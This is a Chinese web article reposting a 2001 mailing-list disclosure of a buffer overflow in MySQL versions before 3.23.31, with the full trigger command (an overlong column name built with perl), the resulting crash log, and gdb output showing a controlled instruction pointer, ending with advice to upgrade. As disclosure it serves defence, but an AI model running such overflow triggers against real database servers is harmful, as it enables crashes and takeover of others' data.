MySQL3.23.31之前版本的安全漏洞
发布:smiling 来源: PHP粉丝网 添加日期:2013-11-14 21:23:40 浏览: 评论:0
所有小于 3.23.31 版本的 MySQL 都存在一个缓冲溢出漏洞导致MySQL 崩溃。使攻击者获得 mysqld 权限,而可以操纵所有数据库。攻击的前提是必须有一个合法的登录名和口令。
下面为最初发表于 MySQL 邮件列表的信件摘要。
==================================================
漏洞是由Jo?o Gouveia 于1月12日发现的:
步骤:
在第一个终端上启动 mysql:
spike:/var/mysql # /sbin/init.d/mysql start
在另外一个终端上输入:
jroberto@spike:~ > mysql -p -e ’select a.’`perl -e’printf("A"x130)’`’.b’
Enter password:
(没有反应?按^C退出)
在第一台终端上会显示:
- spike:/var/mysql # /usr/bin/safe_mysqld: line 149: 15557 Segmentation fault
- nohup
- $ledir/mysqld --basedir=$MY_BASEDIR_VERSION --datadir=$DATADIR --skip-lockin
- g "$@" >>$err_log 2>&1>
- Number of processes running now: 0
- mysqld restarted on Fri Jan 12 07:10:54 WET 2001
- mysqld daemon ended
使用 gdb 显示结果如下:
- (gdb) run
- Starting program: /usr/sbin/mysqld
- [New Thread 16897 (manager thread)]
- [New Thread 16891 (initial thread)]
- [New Thread 16898]
- /usr/sbin/mysqld: ready for connections
- [New Thread 16916]
- [Switching to Thread 16916]
- Program received signal SIGSEGV, Segmentation fault.
- 0x41414141 in ?? ()
- (gdb) info all-registers
- eax 0x1 1
- ecx 0x68 104
- edx 0x8166947 135686471
- ebx 0x41414141 1094795585
- esp 0xbf5ff408 0xbf5ff408
- ebp 0x41414141 0x41414141
- esi 0x41414141 1094795585
- edi 0x0 0
- eip 0x41414141 0x41414141
- eflags 0x10246 66118
- cs 0x23 35
- ss 0x2b 43
- ds 0x2b 43
- es 0x2b 43
- fs 0x0 0
- gs 0x0 0
其中的 eip 指示就是缓冲溢出了。
解决办法就是升级到 3.23.31。所以,各位如果还没有把数据库升级到最新版本,请赶快行动。
Tags: MySQL3 23 31 安全漏洞
- 上一篇:MySQL数据库下载漏洞攻击技术
- 下一篇:通过Mysql的语句生成后门木马的方法
相关文章
- ·mysql提示service mysql3306 does not support chkconfig错误(2015-04-20)
- ·MySQL Replication 遇到 Got fatal error 1236 from master 修复(2014-10-02)
- ·MySQL Error 1236 错误解决办法(2014-10-17)
- ·Windows2003服务器MySql1045 错误(2014-10-10)
推荐文章
热门文章
最新评论文章
- 写给考虑创业的年轻程序员(10)
- PHP新手上路(一)(7)
- 惹恼程序员的十件事(5)
- PHP邮件发送例子,已测试成功(5)
- 致初学者:PHP比ASP优秀的七个理由(4)
- PHP会被淘汰吗?(4)
- PHP新手上路(四)(4)
- 如何去学习PHP?(2)
- 简单入门级php分页代码(2)
- php中邮箱email 电话等格式的验证(2)